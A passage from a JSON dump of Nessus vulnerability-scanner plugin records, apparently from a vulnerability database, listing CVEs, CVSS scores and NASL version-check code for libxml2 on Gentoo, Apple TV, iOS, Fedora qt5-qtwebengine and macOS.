attribute:\"solution\", \n value:\n\"All libxml2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-libs/libxml2-2.9.4-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-libs/libxml2\", unaffected:make_list(\"ge 2.9.4-r1\"), vulnerable:make_list(\"lt 2.9.4-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:05", "description": "According to its banner, the version of Apple TV on the remote device is prior to 10. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - Audio\n - CFNetwork\n - CoreCrypto\n - FontParser\n - IOAcceleratorFamily\n - Kernel\n - libxml2\n - libxslt\n - Security\n - WebKit\n\nNote that only 4th generation models are affected by these vulnerabilities.", "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "nessus", "title": "Apple TV < 10 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4611", "CVE-2016-4658", "CVE-2016-4702", "CVE-2016-4708", "CVE-2016-4712", "CVE-2016-4718", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4728", "CVE-2016-4730", "CVE-2016-4733", "CVE-2016-4734", "CVE-2016-4735", "CVE-2016-4737", "CVE-2016-4738", "CVE-2016-4753", "CVE-2016-4759", "CVE-2016-4765", "CVE-2016-4766", "CVE-2016-4767", "CVE-2016-4768", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4775", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-5131"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_10.NASL", "href": "https://www.tenable.com/plugins/nessus/93776", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93776);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-4611\",\n \"CVE-2016-4658\",\n \"CVE-2016-4702\",\n \"CVE-2016-4708\",\n \"CVE-2016-4712\",\n \"CVE-2016-4718\",\n \"CVE-2016-4725\",\n \"CVE-2016-4726\",\n \"CVE-2016-4728\",\n \"CVE-2016-4730\",\n \"CVE-2016-4733\",\n \"CVE-2016-4734\",\n \"CVE-2016-4735\",\n \"CVE-2016-4737\",\n \"CVE-2016-4738\",\n \"CVE-2016-4753\",\n \"CVE-2016-4759\",\n \"CVE-2016-4765\",\n \"CVE-2016-4766\",\n \"CVE-2016-4767\",\n \"CVE-2016-4768\",\n \"CVE-2016-4772\",\n \"CVE-2016-4773\",\n \"CVE-2016-4774\",\n \"CVE-2016-4775\",\n \"CVE-2016-4776\",\n \"CVE-2016-4777\",\n \"CVE-2016-4778\",\n \"CVE-2016-5131\"\n );\n script_bugtraq_id(\n 92053,\n 93054,\n 93057,\n 93059,\n 93063,\n 93064,\n 93065,\n 93067\n );\n\n script_name(english:\"Apple TV < 10 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 10. It is, therefore, affected by multiple vulnerabilities\nin the following components :\n\n - Audio\n - CFNetwork\n - CoreCrypto\n - FontParser\n - IOAcceleratorFamily\n - Kernel\n - libxml2\n - libxslt\n - Security\n - WebKit\n\nNote that only 4th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207142\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 10 or later. Note that this update is only\navailable for 4th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4702\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\nfixed_build = \"14T330\";\ntvos_ver = '10';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:11", "description": "The version of iOS running on the mobile device is prior to 10.0, and is affected by multiple vulnerabilities in the following components :\n\n - AppleMobileFileIntegrity (CVE-2016-4698)\n - Assets (CVE-2016-4741)\n - Audio (CVE-2016-4702)\n - CFNetwork (CVE-2016-4707, CVE-2016-4708)\n - CommonCrypto (CVE-2016-4711, CVE-2016-4712)\n - FontParser (CVE-2016-4718)\n - GeoServices (CVE-2016-4719)\n - IDS - Connectivity (CVE-2016-4722)\n - IOAcceleratorFamily (CVE-2016-4724, CVE-2016-4725, CVE-2016-4726)\n - Kernel (CVE-2016-4771, CVE-2016-4772, CVE-2016-4773, CVE-2016-4774, CVE-2016-4776, CVE-2016-4777, CVE-2016-4778)\n - Keyboards (CVE-2016-4746)\n - libxml2 (CVE-2016-4658, CVE-2016-5131)\n - libxslt (CVE-2016-4738)\n - Mail (CVE-2016-4747)\n - Messages (CVE-2016-4740)\n - Printing UIKit (CVE-2016-4749)\n - S2 Camera (CVE-2016-4750)\n - Safari Reader (CVE-2016-4618)\n - Sandbox Profiles (CVE-2016-4620)\n - Security (CVE-2016-4753)\n - Springboard (CVE-2016-7759)\n - WebKit (CVE-2016-4728, CVE-2016-4758, CVE-2016-4611, CVE-2016-4729, CVE-2016-4730, CVE-2016-4731, CVE-2016-4734, CVE-2016-4735, CVE-2016-4737, CVE-2016-4759, CVE-2016-4762, CVE-2016-4766, CVE-2016-4767, CVE-2016-4768, CVE-2016-4760, CVE-2016-4733, CVE-2016-4765, CVE-2016-4763)", "cvss3": {}, "published": "2016-10-03T00:00:00", "type": "nessus", "title": "Apple iOS < 10.0 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4611", "CVE-2016-4618", "CVE-2016-4620", "CVE-2016-4658", "CVE-2016-4698", "CVE-2016-4702", "CVE-2016-4707", "CVE-2016-4708", "CVE-2016-4711", "CVE-2016-4712", "CVE-2016-4718", "CVE-2016-4719", "CVE-2016-4722", "CVE-2016-4724", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4728", "CVE-2016-4729", "CVE-2016-4730", "CVE-2016-4731", "CVE-2016-4733", "CVE-2016-4734", "CVE-2016-4735", "CVE-2016-4737", "CVE-2016-4738", "CVE-2016-4740", "CVE-2016-4741", "CVE-2016-4746", "CVE-2016-4747", "CVE-2016-4749", "CVE-2016-4750", "CVE-2016-4753", "CVE-2016-4758", "CVE-2016-4759", "CVE-2016-4760", "CVE-2016-4762", "CVE-2016-4763", "CVE-2016-4765", "CVE-2016-4766", "CVE-2016-4767", "CVE-2016-4768", "CVE-2016-4771", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-5131", "CVE-2016-7759"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:/o:apple:iphone_os"], "id": "9619.PRM", "href": "https://www.tenable.com/plugins/nnm/9619", "sourceData": "Binary data 9619.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:16:17", "description": "This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS (long-term support) branch. This is a snapshot of the QtWebEngine that will be included in the bugfix and security release Qt 5.6.3, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155, CVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171, CVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186, CVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214, CVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652, CVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009, CVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016, CVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024, CVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029, CVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046, CVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050, CVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062, CVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078, CVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in QtWebEngine 5.7.x) with security fixes from Chromium up to version 59.0.3071.104. (5.6.2 was based on Chromium 45.0.2554.101 with security fixes from Chromium up to version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been backported.\n\nSee http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all security backports are listed in that file yet. The list above is accurate.)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "nessus", "title": "Fedora 24 : qt5-qtwebengine (2017-98bed96d12)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5078", "CVE-2016-5133", "CVE-2016-5147", "CVE-2016-5153", "CVE-2016-5155", "CVE-2016-5161", "CVE-2016-5166", "CVE-2016-5170", "CVE-2016-5171", "CVE-2016-5172", "CVE-2016-5181", "CVE-2016-5185", "CVE-2016-5186", "CVE-2016-5187", "CVE-2016-5188", "CVE-2016-5192", "CVE-2016-5198", "CVE-2016-5205", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652", "CVE-2017-5006", "CVE-2017-5007", "CVE-2017-5008", "CVE-2017-5009", "CVE-2017-5010", "CVE-2017-5012", "CVE-2017-5015", "CVE-2017-5016", "CVE-2017-5017", "CVE-2017-5019", "CVE-2017-5023", "CVE-2017-5024", "CVE-2017-5025", "CVE-2017-5026", "CVE-2017-5027", "CVE-2017-5029", "CVE-2017-5033", "CVE-2017-5037", "CVE-2017-5044", "CVE-2017-5046", "CVE-2017-5047", "CVE-2017-5048", "CVE-2017-5049", "CVE-2017-5050", "CVE-2017-5051", "CVE-2017-5059", "CVE-2017-5061", "CVE-2017-5062", "CVE-2017-5065", "CVE-2017-5067", "CVE-2017-5069", "CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5083", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-98BED96D12.NASL", "href": "https://www.tenable.com/plugins/nessus/101920", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-98bed96d12.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101920);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2016-5078\",\n \"CVE-2016-5133\",\n \"CVE-2016-5147\",\n \"CVE-2016-5153\",\n \"CVE-2016-5155\",\n \"CVE-2016-5161\",\n \"CVE-2016-5166\",\n \"CVE-2016-5170\",\n \"CVE-2016-5171\",\n \"CVE-2016-5172\",\n \"CVE-2016-5181\",\n \"CVE-2016-5185\",\n \"CVE-2016-5186\",\n \"CVE-2016-5187\",\n \"CVE-2016-5188\",\n \"CVE-2016-5192\",\n \"CVE-2016-5198\",\n \"CVE-2016-5205\",\n \"CVE-2016-5207\",\n \"CVE-2016-5208\",\n \"CVE-2016-5214\",\n \"CVE-2016-5215\",\n \"CVE-2016-5221\",\n \"CVE-2016-5222\",\n \"CVE-2016-5224\",\n \"CVE-2016-5225\",\n \"CVE-2016-9650\",\n \"CVE-2016-9651\",\n \"CVE-2016-9652\",\n \"CVE-2017-5006\",\n \"CVE-2017-5007\",\n \"CVE-2017-5008\",\n \"CVE-2017-5009\",\n \"CVE-2017-5010\",\n \"CVE-2017-5012\",\n \"CVE-2017-5015\",\n \"CVE-2017-5016\",\n \"CVE-2017-5017\",\n \"CVE-2017-5019\",\n \"CVE-2017-5023\",\n \"CVE-2017-5024\",\n \"CVE-2017-5025\",\n \"CVE-2017-5026\",\n \"CVE-2017-5027\",\n \"CVE-2017-5029\",\n \"CVE-2017-5033\",\n \"CVE-2017-5037\",\n \"CVE-2017-5044\",\n \"CVE-2017-5046\",\n \"CVE-2017-5047\",\n \"CVE-2017-5048\",\n \"CVE-2017-5049\",\n \"CVE-2017-5050\",\n \"CVE-2017-5051\",\n \"CVE-2017-5059\",\n \"CVE-2017-5061\",\n \"CVE-2017-5062\",\n \"CVE-2017-5065\",\n \"CVE-2017-5067\",\n \"CVE-2017-5069\",\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5083\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-98bed96d12\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 24 : qt5-qtwebengine (2017-98bed96d12)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to a snapshot from the Qt 5.6 LTS\n(long-term support) branch. This is a snapshot of the QtWebEngine that\nwill be included in the bugfix and security release Qt 5.6.3, but only\nthe QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.6.2:\nCVE-2016-5133, CVE-2016-5147, CVE-2016-5153, CVE-2016-5155,\nCVE-2016-5161, CVE-2016-5166, CVE-2016-5170, CVE-2016-5171,\nCVE-2016-5172, CVE-2016-5181, CVE-2016-5185, CVE-2016-5186,\nCVE-2016-5187, CVE-2016-5188, CVE-2016-5192, CVE-2016-5198,\nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5221, CVE-2016-5222, CVE-2016-5224,\nCVE-2016-5225, CVE-2016-9650, CVE-2016-9651, CVE-2016-9652,\nCVE-2017-5006, CVE-2017-5007, CVE-2017-5008, CVE-2017-5009,\nCVE-2017-5010, CVE-2017-5012, CVE-2017-5015, CVE-2017-5016,\nCVE-2017-5017, CVE-2017-5019, CVE-2017-5023, CVE-2017-5024,\nCVE-2017-5025, CVE-2017-5026, CVE-2017-5027, CVE-2017-5029,\nCVE-2017-5033, CVE-2017-5037, CVE-2017-5044, CVE-2017-5046,\nCVE-2017-5047, CVE-2017-5048, CVE-2017-5049, CVE-2017-5050,\nCVE-2017-5051, CVE-2017-5059, CVE-2017-5061, CVE-2017-5062,\nCVE-2017-5065, CVE-2017-5067, CVE-2017-5069, CVE-2017-5070,\nCVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2016-5078,\nCVE-2017-5083, and CVE-2017-5089.\n\nOther important changes include :\n\n - Based on Chromium 49.0.2623.111 (the version used in\n QtWebEngine 5.7.x) with security fixes from Chromium up\n to version 59.0.3071.104. (5.6.2 was based on Chromium\n 45.0.2554.101 with security fixes from Chromium up to\n version 52.0.2743.116.)\n\n - All other bug fixes from QtWebEngine 5.7.1 have been\n backported.\n\nSee\nhttp://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.\n6 for details. (Please note that at the time of this writing, not all\nsecurity backports are listed in that file yet. The list above is\naccurate.)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n # http://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.6.3?h=5.6\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dfc84d1b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-98bed96d12\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"qt5-qtwebengine-5.6.3-0.1.20170712gitee719ad313e564.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:39", "description": "The remote host is running a version of Mac OS X that is prior to 10.10.5, 10.11.x prior to 10.11.6, or is not macOS 10.12. It is, therefore, affected by multiple vulnerabilities in the following components :\n\n - apache\n - apache_mod_php\n - Apple HSSPI Support\n - AppleEFIRuntime\n - AppleMobileFileIntegrity\n - AppleUCC\n - Application Firewall\n - ATS\n - Audio\n - Bluetooth\n - cd9660\n - CFNetwork\n - CommonCrypto\n - CoreCrypto\n - CoreDisplay\n - curl\n - Date & Time Pref Pane\n - DiskArbitration\n - File Bookmark\n - FontParser\n - IDS - Connectivity\n - ImageIO\n - Intel Graphics Driver\n - IOAcceleratorFamily\n - IOThunderboltFamily\n - Kerberos v5 PAM module\n - Kernel\n - libarchive\n - libxml2\n - libxpc\n - libxslt\n - mDNSResponder\n - NSSecureTextField\n - Perl\n - S2 Camera\n - Security\n - Terminal\n - WindowServer\n\nNote that successful exploitation of the most serious issues can result in arbitrary code execution.", "cvss3": {}, "published": "2016-09-23T00:00:00", "type": "nessus", "title": "macOS < 10.12 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0755", "CVE-2016-4617", "CVE-2016-4658", "CVE-2016-4682", "CVE-2016-4694", "CVE-2016-4696", "CVE-2016-4697", "CVE-2016-4698", "CVE-2016-4699", "CVE-2016-4700", "CVE-2016-4701", "CVE-2016-4702", "CVE-2016-4703", "CVE-2016-4706", "CVE-2016-4707", "CVE-2016-4708", "CVE-2016-4709", "CVE-2016-4710", "CVE-2016-4711", "CVE-2016-4712", "CVE-2016-4713", "CVE-2016-4715", "CVE-2016-4716", "CVE-2016-4717", "CVE-2016-4718", "CVE-2016-4722", "CVE-2016-4723", "CVE-2016-4724", "CVE-2016-4725", "CVE-2016-4726", "CVE-2016-4727", "CVE-2016-4736", "CVE-2016-4738", "CVE-2016-4739", "CVE-2016-4742", "CVE-2016-4745", "CVE-2016-4748", "CVE-2016-4750", "CVE-2016-4752", "CVE-2016-4753", "CVE-2016-4755", "CVE-2016-4771", "CVE-2016-4772", "CVE-2016-4773", "CVE-2016-4774", "CVE-2016-4775", "CVE-2016-4776", "CVE-2016-4777", "CVE-2016-4778", "CVE-2016-4779", "CVE-2016-5131", "CVE-2016-5768", "CVE-2016-5769", "CVE-2016-5770", "CVE-2016-5771", "CVE-2016-5772", "CVE-2016-5773", "CVE-2016-6174", "CVE-2016-6288", "CVE-2016-6289", "CVE-2016-6290", "CVE-2016-6291", "CVE-2016-6292", "CVE-2016-6294", "CVE-2016-6295", "CVE-2016-6296", "CVE-2016-6297", "CVE-2016-7580", "CVE-2016-7582"], "modified": "2019-06-19T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_12.NASL", "href": "https://www.tenable.com/plugins/nessus/93685", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93685);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2016-0755\",\n \"CVE-2016-4617\",\n \"CVE-2016-4658\",\n \"CVE-2016-4682\",\n \"CVE-2016-4694\",\n \"CVE-2016-4696\",\n \"CVE-2016-4697\",\n \"CVE-2016-4698\",\n \"CVE-2016-4699\",\n \"CVE-2016-4700\",\n \"CVE-2016-4701\",\n \"CVE-2016-4702\",\n \"CVE-2016-4703\",\n \"CVE-2016-4706\",\n \"CVE-2016-4707\",\n \"CVE-2016-4708\",\n \"CVE-2016-4709\",\n \"CVE-2016-4710\",\n \"CVE-2016-4711\",\n \"CVE-2016-4712\",\n \"CVE-2016-4713\",\n \"CVE-2016-4715\",\n \"CVE-2016-4716\",\n \"CVE-2016-4717\",\n \"CVE-2016-4718\",\n \"CVE-2016-4722\",\n \"CVE-2016-4723\",\n \"CVE-2016-4724\",\n \"CVE-2016-4725\",\n \"CVE-2016-4726\",\n \"CVE-2016-4727\",\n \"CVE-2016-4736\",\n \"CVE-2016-4738\",\n \"CVE-2016-4739\",\n \"CVE-2016-4742\",\n \"CVE-2016-4745\",\n \"CVE-2016-4748\",\n \"CVE-2016-4750\",\n \"CVE-2016-4752\",\n \"CVE-2016-4753\",\n \"CVE-2016-4755\",\n \"CVE-2016-4771\",\n \"CVE-2016-4772\",\n \"CVE-2016-4773\",\n \"CVE-2016-4774\",\n \"CVE-2016-4775\",\n \"CVE-2016-4776\",\n \"CVE-2016-4777\",\n \"CVE-2016-4778\",\n \"CVE-2016-4779\",\n \"CVE-2016-5131\",\n \"CVE-2016-5768\",\n \"CVE-2016-5769\",\n \"CVE-2016-5770\",\n \"CVE-2016-5771\",\n \"CVE-2016-5772\",\n \"CVE-2016-5773\",\n \"CVE-2016-6174\",\n \"CVE-2016-6288\",\n \"CVE-2016-6289\",\n \"CVE-2016-6290\",\n \"CVE-2016-6291\",\n \"CVE-2016-6292\",\n \"CVE-2016-6294\",\n \"CVE-2016-6295\",\n \"CVE-2016-6296\",\n \"CVE-2016-6297\",\n \"CVE-2016-7580\",\n \"CVE-2016-7582\"\n );\n script_bugtraq_id(\n 82307,\n 91396,\n 91397,\n 91398,\n 91399,\n 91401,\n 91403,\n 91732,\n 92053,\n 92073,\n 92074,\n 92078,\n 92094,\n 92095,\n 92097,\n 92099,\n 92111,\n 92115,\n 93054,\n 93055,\n 93056,\n 93059,\n 93060,\n 93063,\n 93852,\n 94434,\n 